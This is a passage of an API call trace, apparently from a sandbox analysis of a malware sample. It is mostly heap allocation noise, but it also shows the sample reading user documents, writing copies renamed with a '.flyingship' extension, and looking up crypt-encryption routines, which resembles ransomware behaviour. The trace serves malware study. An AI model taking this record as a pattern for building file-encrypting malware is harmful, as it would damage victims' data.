Size=0x4) returned 0x9c28e8 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0178.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0178.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0178.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0178.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0178.119] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf")) returned 0x10 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0178.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0178.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0178.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0178.120] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.flyingship.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\hvt5kt0pfopfwsd qzn.flyingship.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0178.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0178.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.121] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.122] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0178.122] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0178.122] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x9f51, lpOverlapped=0x0) returned 1 [0178.125] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0178.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.125] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0178.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.125] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9f51) returned 0xbea018 [0178.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0178.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0178.126] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0178.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0178.126] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9f51) returned 0xbf3f78 [0178.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0178.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.127] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0178.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.127] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9f51) returned 0xbea018 [0178.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0178.127] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0178.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.128] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0178.128] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0178.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.128] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0178.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.128] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0178.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0178.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0178.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0178.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.128] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9f51) returned 0xbea018 [0178.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0178.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0178.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0178.129] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0178.129] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x9f51) returned 0xbfded8 [0178.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0178.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.130] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0178.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0178.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0178.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0178.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0178.130] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0178.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0178.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0178.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0178.131] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0178.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0178.131] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0178.131] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.131] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0178.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28c8 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0178.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0178.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.132] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.132] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0178.132] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.133] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.133] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0178.133] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0178.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0178.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0178.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0178.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) 